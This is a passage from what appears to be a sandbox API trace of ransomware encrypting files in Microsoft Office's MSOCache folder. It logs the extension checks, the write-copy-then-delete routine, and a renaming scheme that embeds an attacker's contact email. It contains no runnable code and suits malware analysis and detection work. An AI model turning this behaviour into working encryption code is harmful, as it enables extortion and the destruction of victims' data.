lpString2=".dll") returned 1 [0050.767] lstrlenW (lpString=".docx") returned 5 [0050.767] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0050.767] lstrlenW (lpString=".pdf") returned 4 [0050.767] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.767] lstrlenW (lpString=".xls") returned 4 [0050.767] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.767] lstrlenW (lpString=".xlsx") returned 5 [0050.767] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0050.767] lstrlenW (lpString=".ppt") returned 4 [0050.767] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.767] lstrlenW (lpString=".zip") returned 4 [0050.767] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.767] lstrlenW (lpString=".rar") returned 4 [0050.767] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.767] lstrlenW (lpString=".bz2") returned 4 [0050.767] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.767] lstrlenW (lpString=".7z") returned 3 [0050.767] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.767] lstrlenW (lpString=".dbf") returned 4 [0050.767] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.767] lstrlenW (lpString=".1cd") returned 4 [0050.767] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.767] lstrlenW (lpString=".jpg") returned 4 [0050.767] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.767] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0050.767] lstrlenW (lpString="PidGenX.dll") returned 11 [0050.767] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.768] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1463568) returned 1 [0050.768] CloseHandle (hObject=0x218) returned 1 [0050.768] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0050.768] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.768] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.768] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.768] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.768] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.769] GetLastError () returned 0x0 [0050.769] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.791] WriteFile (in: hFile=0x200, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.807] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x65520, lpOverlapped=0x0) returned 1 [0050.820] WriteFile (in: hFile=0x200, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x65530, lpOverlapped=0x0) returned 1 [0050.887] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.888] WriteFile (in: hFile=0x200, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.888] SetEndOfFile (hFile=0x200) returned 1 [0050.889] CloseHandle (hObject=0x200) returned 1 [0050.889] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.889] SetEndOfFile (hFile=0x218) returned 1 [0050.892] CloseHandle (hObject=0x218) returned 1 [0050.892] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0050.893] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0050.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.893] lstrlenW (lpString=".doc") returned 4 [0050.893] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.893] lstrlenW (lpString=".docx") returned 5 [0050.893] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0050.893] lstrlenW (lpString=".pdf") returned 4 [0050.893] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.893] lstrlenW (lpString=".xls") returned 4 [0050.893] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.893] lstrlenW (lpString=".xlsx") returned 5 [0050.893] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0050.893] lstrlenW (lpString=".ppt") returned 4 [0050.893] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.893] lstrlenW (lpString=".zip") returned 4 [0050.894] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString=".rar") returned 4 [0050.894] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString=".bz2") returned 4 [0050.894] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.894] lstrlenW (lpString=".7z") returned 3 [0050.894] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.894] lstrlenW (lpString=".dbf") returned 4 [0050.894] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.894] lstrlenW (lpString=".1cd") returned 4 [0050.894] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.894] lstrlenW (lpString=".jpg") returned 4 [0050.894] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.894] lstrlenW (lpString=".doc") returned 4 [0050.894] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString=".docx") returned 5 [0050.894] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0050.894] lstrlenW (lpString=".pdf") returned 4 [0050.894] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString=".xls") returned 4 [0050.894] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString=".xlsx") returned 5 [0050.894] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0050.894] lstrlenW (lpString=".ppt") returned 4 [0050.894] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.894] lstrlenW (lpString=".zip") returned 4 [0050.894] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.894] lstrlenW (lpString=".rar") returned 4 [0050.894] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.895] lstrlenW (lpString=".bz2") returned 4 [0050.895] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.895] lstrlenW (lpString=".7z") returned 3 [0050.895] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.895] lstrlenW (lpString=".dbf") returned 4 [0050.895] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.895] lstrlenW (lpString=".1cd") returned 4 [0050.895] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.895] lstrlenW (lpString=".jpg") returned 4 [0050.895] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.895] lstrcmpiW (lpString1=".xrm-ms", lpString2=".USA") returned 1 [0050.895] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0050.895] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.026] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=715834) returned 1 [0052.026] CloseHandle (hObject=0x1a0) returned 1 [0052.026] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0052.026] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.027] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.027] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.027] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.027] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0052.027] GetLastError () returned 0x0 [0052.027] ReadFile (in: hFile=0x1a0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0052.042] WriteFile (in: hFile=0x178, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0052.055] ReadFile (in: hFile=0x1a0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.055] WriteFile (in: hFile=0x178, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x104, lpOverlapped=0x0) returned 1 [0052.055] SetEndOfFile (hFile=0x178) returned 1 [0052.055] CloseHandle (hObject=0x178) returned 1 [0052.055] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.055] SetEndOfFile (hFile=0x1a0) returned 1 [0052.061] CloseHandle (hObject=0x1a0) returned 1 [0052.061] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.061] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0052.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.061] lstrlenW (lpString=".doc") returned 4 [0052.061] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0052.061] lstrlenW (lpString=".docx") returned 5 [0052.061] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0052.061] lstrlenW (lpString=".pdf") returned 4 [0052.062] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString=".xls") returned 4 [0052.062] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString=".xlsx") returned 5 [0052.062] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0052.062] lstrlenW (lpString=".ppt") returned 4 [0052.062] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.062] lstrlenW (lpString=".zip") returned 4 [0052.062] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString=".rar") returned 4 [0052.062] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString=".bz2") returned 4 [0052.062] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString=".7z") returned 3 [0052.062] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0052.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.062] lstrlenW (lpString=".dbf") returned 4 [0052.062] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.062] lstrlenW (lpString=".1cd") returned 4 [0052.062] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.062] lstrlenW (lpString=".jpg") returned 4 [0052.062] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.062] lstrlenW (lpString=".doc") returned 4 [0052.062] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0052.062] lstrlenW (lpString=".docx") returned 5 [0052.062] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0052.063] lstrlenW (lpString=".pdf") returned 4 [0052.063] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString=".xls") returned 4 [0052.063] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString=".xlsx") returned 5 [0052.063] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0052.063] lstrlenW (lpString=".ppt") returned 4 [0052.063] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.063] lstrlenW (lpString=".zip") returned 4 [0052.063] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString=".rar") returned 4 [0052.063] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString=".bz2") returned 4 [0052.063] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString=".7z") returned 3 [0052.063] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0052.063] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.063] lstrlenW (lpString=".dbf") returned 4 [0052.063] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.063] lstrlenW (lpString=".1cd") returned 4 [0052.063] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0052.063] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.063] lstrlenW (lpString=".jpg") returned 4 [0052.063] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0052.063] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0052.063] lstrlenW (lpString="Office32WW.msi") returned 14 [0052.064] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.064] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1992192) returned 1 [0052.064] CloseHandle (hObject=0x1a0) returned 1 [0052.064] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0052.064] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.064] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0052.065] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.065] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0052.065] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0052.065] ReadFile (in: hFile=0x1a0, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.214] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0052.214] ReadFile (in: hFile=0x1a0, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.217] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.217] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0052.217] ReadFile (in: hFile=0x1a0, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.245] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.245] WriteFile (in: hFile=0x1a0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0052.408] SetEndOfFile (hFile=0x1a0) returned 1 [0052.408] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f10058 [0052.413] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0052.413] WriteFile (in: hFile=0x1a0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.414] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0052.414] WriteFile (in: hFile=0x1a0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.416] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0052.416] WriteFile (in: hFile=0x1a0, lpBuffer=0x3f10058*, 